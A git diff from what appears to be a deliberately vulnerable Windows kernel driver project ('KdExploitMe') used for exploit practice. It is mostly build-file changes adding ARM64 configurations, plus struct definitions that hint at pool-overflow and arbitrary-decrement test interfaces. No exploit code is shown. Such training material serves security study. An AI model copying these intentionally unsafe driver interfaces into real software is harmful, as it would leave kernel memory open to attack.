+ DWORD SourceLength;
+ PVOID Source;
+ DWORD DestLength;
+ PVOID Dest;
+} DATACOPY, *PDATACOPY;
+
+typedef struct _DECADDRESS
+{
+ BOOL Dec;
+ size_t* Value;
+} DECADDRESS, *PDECADDRESS;
+
+typedef struct _OVERFLOW_PAGEDPOOL
+{
+ POOL_TYPE PoolType;
+ DWORD AllocationSize;
+ UNICODE_STRING UserData;
+} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
diff --git a/ExploitDemos/stdafx.cpp b/ExploitDemos/stdafx.cpp
index a0dbff3..be1a169 100644
--- a/ExploitDemos/stdafx.cpp
+++ b/ExploitDemos/stdafx.cpp
@@ -1,8 +1,8 @@
-// stdafx.cpp : source file that includes just the standard includes
-// ExploitDemos.pch will be the pre-compiled header
-// stdafx.obj will contain the pre-compiled type information
-
-#include "stdafx.h"
-
-// TODO: reference any additional headers you need in STDAFX.H
-// and not in this file
+// stdafx.cpp : source file that includes just the standard includes
+// ExploitDemos.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/ExploitDemos/stdafx.h b/ExploitDemos/stdafx.h
index 5ce5d13..e1f5d1f 100644
--- a/ExploitDemos/stdafx.h
+++ b/ExploitDemos/stdafx.h
@@ -1,29 +1,29 @@
-// stdafx.h : include file for standard system include files,
-// or project specific include files that are used frequently, but
-// are changed infrequently
-//
-
-#pragma once
-
-#include "targetver.h"
-
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define WIN32_LEAN_AND_MEAN
-#include
-
-#include
-#include
-#include
-#include
-#include
-
-#include "..\KdExploitMe\KdExploitMe.h"
-
-
-// TODO: reference additional headers your program requires here
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define WIN32_LEAN_AND_MEAN
+#include
+
+#include
+#include
+#include
+#include
+#include
+
+#include "..\KdExploitMe\KdExploitMe.h"
+
+
+// TODO: reference additional headers your program requires here
diff --git a/ExploitDemos/targetver.h b/ExploitDemos/targetver.h
index 87c0086..90e767b 100644
--- a/ExploitDemos/targetver.h
+++ b/ExploitDemos/targetver.h
@@ -1,8 +1,8 @@
-#pragma once
-
-// Including SDKDDKVer.h defines the highest available Windows platform.
-
-// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
-// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
-
-#include
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
new file mode 100644
index 0000000..9cd4e84
--- /dev/null
+++ b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Win8.1 Release|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.Build.CppClean.log b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.Build.CppClean.log
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.exe.recipe b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.exe.recipe
new file mode 100644
index 0000000..4edf92f
--- /dev/null
+++ b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Win8.1 Release\KdExploitMe Package.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.log b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.log
new file mode 100644
index 0000000..5f28270
--- /dev/null
+++ b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.log
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.vcxproj.FileListAbsolute.txt b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe Package/KdExploitMe Package.vcxproj b/KdExploitMe Package/KdExploitMe Package.vcxproj
index e267ad8..c2ad4b9 100644
--- a/KdExploitMe Package/KdExploitMe Package.vcxproj
+++ b/KdExploitMe Package/KdExploitMe Package.vcxproj
@@ -1,338 +1,381 @@
-
-
-
-
- Win8.1 Debug
- Win32
-
-
- Win8.1 Release
- Win32
-
-
- Win8 Debug
- Win32
-
-
- Win8 Release
- Win32
-
-
- Win7 Debug
- Win32
-
-
- Win7 Release
- Win32
-
-
- Win8.1 Debug
- x64
-
-
- Win8.1 Release
- x64
-
-
- Win8 Debug
- x64
-
-
- Win8 Release
- x64
-
-
- Win7 Debug
- x64
-
-
- Win7 Release
- x64
-
-
-
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}
- {4605da2c-74a5-4865-98e1-152ef136825f}
- v4.5
- 11.0
- Win8.1 Debug
- Win32
- KdExploitMe_Package
-
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
-
-
-
-
-
-
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
-
-
-
-
- {a239482b-8b6c-448f-969b-563e3b8de701}
-
-
-
-
-
+
+
+
+
+ Win7 Debug
+ ARM64
+
+
+ Win7 Release
+ ARM64
+
+
+ Win8 Debug
+ ARM64
+
+
+ Win8 Release
+ ARM64
+
+
+ Win8.1 Debug
+ ARM64
+
+
+ Win8.1 Debug
+ Win32
+
+
+ Win8.1 Release
+ ARM64
+
+
+ Win8.1 Release
+ Win32
+
+
+ Win8 Debug
+ Win32
+
+
+ Win8 Release
+ Win32
+
+
+ Win7 Debug
+ Win32
+
+
+ Win7 Release
+ Win32
+
+
+ Win8.1 Debug
+ x64
+
+
+ Win8.1 Release
+ x64
+
+
+ Win8 Debug
+ x64
+
+
+ Win8 Release
+ x64
+
+
+ Win7 Debug
+ x64
+
+
+ Win7 Release
+ x64
+
+
+
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}
+ {4605da2c-74a5-4865-98e1-152ef136825f}
+ v4.5
+ 11.0
+ Win8.1 Debug
+ Win32
+ KdExploitMe_Package
+ 10.0.26100.0
+
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+
+
+
+
+
+
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+
+
+
+
+ {a239482b-8b6c-448f-969b-563e3b8de701}
+
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/KdExploitMe Package.vcxproj.filters b/KdExploitMe Package/KdExploitMe Package.vcxproj.filters
index e1b34f2..73af436 100644
--- a/KdExploitMe Package/KdExploitMe Package.vcxproj.filters
+++ b/KdExploitMe Package/KdExploitMe Package.vcxproj.filters
@@ -1,9 +1,9 @@
-
-
-
-
- {8E41214B-6785-4CFE-B992-037D68949A14}
- inf;inv;inx;mof;mc;
-
-
+
+
+
+
+ {8E41214B-6785-4CFE-B992-037D68949A14}
+ inf;inv;inx;mof;mc;
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/KdExploitMe Package.vcxproj.user b/KdExploitMe Package/KdExploitMe Package.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/KdExploitMe Package/KdExploitMe Package.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
index 02e5dd3..63898e6 100644
--- a/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
+++ b/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
index bc243c7..80286fb 100644
--- a/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
+++ b/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Release|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Release|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
index cd25adb..01347e1 100644
--- a/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
+++ b/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe.sln b/KdExploitMe.sln
index f352c9e..03086fa 100644
--- a/KdExploitMe.sln
+++ b/KdExploitMe.sln
@@ -1,94 +1,122 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 2013
-VisualStudioVersion = 12.0.21005.1
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe", "KdExploitMe\KdExploitMe.vcxproj", "{A239482B-8B6C-448F-969B-563E3B8DE701}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe Package", "KdExploitMe Package\KdExploitMe Package.vcxproj", "{1B88051D-A188-4B91-8E2F-5507B2D85D9D}"
- ProjectSection(ProjectDependencies) = postProject
- {A239482B-8B6C-448F-969B-563E3B8DE701} = {A239482B-8B6C-448F-969B-563E3B8DE701}
- EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExploitDemos", "ExploitDemos\ExploitDemos.vcxproj", "{D6194E14-75CE-456F-8771-2C7EF4455384}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Debug|x64 = Debug|x64
- Release|Win32 = Release|Win32
- Release|x64 = Release|x64
- Win7 Debug|Win32 = Win7 Debug|Win32
- Win7 Debug|x64 = Win7 Debug|x64
- Win7 Release|Win32 = Win7 Release|Win32
- Win7 Release|x64 = Win7 Release|x64
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Build.0 = Win8.1 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Build.0 = Win8.1 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.ActiveCfg = Win8.1 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Build.0 = Win8.1 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Deploy.0 = Win8.1 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.Build.0 = Win7 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Build.0 = Win8.1 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Build.0 = Win8.1 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.ActiveCfg = Win8.1 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Build.0 = Win8.1 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Deploy.0 = Win8.1 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.Build.0 = Win7 Release|x64
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Build.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Deploy.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|x64.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.ActiveCfg = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Build.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Deploy.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|x64.ActiveCfg = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Build.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Deploy.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|x64.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.ActiveCfg = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Build.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Deploy.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.ActiveCfg = Release|x64
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.Build.0 = Release|x64
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.14.36811.4 d17.14
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe", "KdExploitMe\KdExploitMe.vcxproj", "{A239482B-8B6C-448F-969B-563E3B8DE701}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe Package", "KdExploitMe Package\KdExploitMe Package.vcxproj", "{1B88051D-A188-4B91-8E2F-5507B2D85D9D}"
+ ProjectSection(ProjectDependencies) = postProject
+ {A239482B-8B6C-448F-969B-563E3B8DE701} = {A239482B-8B6C-448F-969B-563E3B8DE701}
+ EndProjectSection
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExploitDemos", "ExploitDemos\ExploitDemos.vcxproj", "{D6194E14-75CE-456F-8771-2C7EF4455384}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|ARM64 = Debug|ARM64
+ Debug|Win32 = Debug|Win32
+ Debug|x64 = Debug|x64
+ Release|ARM64 = Release|ARM64
+ Release|Win32 = Release|Win32
+ Release|x64 = Release|x64
+ Win7 Debug|ARM64 = Win7 Debug|ARM64
+ Win7 Debug|Win32 = Win7 Debug|Win32
+ Win7 Debug|x64 = Win7 Debug|x64
+ Win7 Release|ARM64 = Win7 Release|ARM64
+ Win7 Release|Win32 = Win7 Release|Win32
+ Win7 Release|x64 = Win7 Release|x64
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|ARM64.ActiveCfg = Win8.1 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|ARM64.Build.0 = Win8.1 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Build.0 = Win8.1 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|ARM64.Build.0 = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Build.0 = Win8.1 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.ActiveCfg = Win8.1 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Build.0 = Win8.1 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Deploy.0 = Win8.1 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|ARM64.ActiveCfg = Win7 Debug|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|ARM64.Build.0 = Win7 Debug|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|ARM64.Build.0 = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.Build.0 = Win7 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|ARM64.ActiveCfg = Win8.1 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|ARM64.Build.0 = Win8.1 Release|ARM64
